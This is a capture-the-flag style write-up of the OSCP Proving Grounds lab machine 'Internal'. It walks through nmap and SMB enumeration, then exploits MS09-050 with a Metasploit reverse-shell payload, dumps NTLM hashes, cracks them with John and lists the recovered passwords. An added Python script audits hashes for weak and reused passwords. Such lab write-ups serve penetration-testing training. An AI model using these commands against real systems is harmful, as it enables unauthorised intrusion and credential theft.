Internal – OSCP Proving Grounds

Introduction

For this engagement, I tackled the OSCP Proving Grounds machine Internal. The goal was to gain a foothold, escalate privileges, and ultimately retrieve the flag from the administrator’s account. In this write-up, I’ll document my approach, mistakes, and lessons learned along the way.

Step 1: Initial Reconnaissance

Before attempting any exploits, I conducted a full port scan to identify available services.

Nmap Scan

I began with a basic Nmap scan to detect open ports and running services:

nmap -sC -sV --open <target_IP>

Findings:

  • SMB – 139, 445 (Microsoft Windows netbios-ssn, microsoft-ds)
  • RDP – 3389 (Microsoft Terminal Service)
  • DNS – 53 (Microsoft DNS Server)
  • HTTP API – 5357 (Microsoft HTTPAPI/2.0)
  • High-numbered ports (49152-49158, Microsoft Windows RPC)
  • Host identified as Windows Server 2008 SP1

This information immediately pointed me toward SMB, a common attack vector in pentesting Windows systems.

Step 2: SMB Enumeration

Since SMB was open, I attempted to list shares and check for any anonymous access.

Checking SMB Shares

smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>

Results:

  • No anonymous access to shares.
  • Nmap vulnerability scan on SMB:
    nmap --script smb-vuln* -p 445 <target_IP>
  • Vulnerability Detected: MS09-050 (CVE-2009-3103) – SMBv2 Remote Code Execution

This vulnerability allowed remote code execution on Windows Vista/Server 2008 systems via SMBv2, making it a prime target for exploitation.

Step 3: Exploitation (MS09-050)

Armed with the vulnerability details, I loaded the corresponding Metasploit module:

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <your_Kali_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 9999
run

Initial Failure & Debugging

  • First attempt failed. The exploit executed, but no shell was returned.
  • Realized my LHOST was incorrect (it defaulted to my local IP instead of my VPN tun0 IP).
  • Fixed by setting:
    set LHOST <tun0 IP>
  • Reran the exploit → Meterpreter session obtained! 🎉

Step 4: Post-Exploitation – Gaining SYSTEM Privileges

With an active Meterpreter session, I confirmed my access level:

getuid

✅ User: NT AUTHORITY\SYSTEM (No privilege escalation needed!)

Enumerating Users & Files

  • List users:
    net user
  • Check for active sessions:
    query user
  • Look for the flag:
    search -f proof.txt
    Found: C:\Users\Administrator\Desktop\proof.txt

Retrieving the Flag

cat C:\Users\Administrator\Desktop\proof.txt

πŸ† Flag captured!

Step 5: Credential Dumping & Password Cracking

Since I had SYSTEM privileges, I dumped the NTLM hashes:

hashdump

Extracted Hashes:

aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966

Cracking the Passwords with John:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

✅ Recovered Passwords:

  • Aaron → blue
  • Jack → aaa
  • Niky → niky

These passwords could potentially allow lateral movement to other machines in a real engagement.
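As an added example (not part of this write-up), the same hashdump can be audited from the defender's side without cracking anything: NT hashes are unsalted MD4 over the UTF-16LE password, so hashing a banned-password list once is enough to spot accounts using those passwords, empty passwords, or the same password as another account. The MD4 is implemented in pure Python so it runs offline; the input is the five hashdump lines quoted above and the three recovered passwords.

```python
import struct
from collections import defaultdict

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is unsalted MD4 over UTF-16LE."""
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & MASK
    rounds = (  # (mixing function, additive constant, word order, shift schedule)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: the next step updates what is now 'a'
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16le")).hex()

def audit(hashdump_lines, banned):
    """Flag NT hashes equal to a banned or empty password, or shared between accounts (reuse)."""
    table = {nt_hash(p): p for p in list(banned) + [""]}
    by_hash, weak = defaultdict(list), {}
    for line in hashdump_lines:
        f = line.strip().split(":")  # user:rid:nt as quoted above, or user:rid:lm:nt::: from meterpreter
        if len(f) < 3:
            continue
        nt = (f[3] if len(f) > 3 and len(f[3]) == 32 else f[2]).lower()
        by_hash[nt].append(f[0])
        if nt in table:
            weak[f[0]] = table[nt]
    reused = sorted(users for users in by_hash.values() if len(users) > 1)
    return {"weak": weak, "reused": reused}

# Hashdump lines quoted from the write-up; the banned list is its three recovered passwords.
HASHDUMP = """aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966""".splitlines()
print(audit(HASHDUMP, ["blue", "aaa", "niky"]))
```

The same `audit` call with an organisation's own banned-password list turns a SAM dump taken during an authorised assessment into a weak-credential and password-reuse report in one pass.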

Lessons Learned

  • Always check LHOST settings in Metasploit when using a VPN or NAT.
  • SMB is a critical attack vector on older Windows servers.
  • Windows user hashes can reveal weak credentials for lateral movement.
  • Automating enumeration steps (with smbclient, nmap, and hashdump) speeds up workflow.
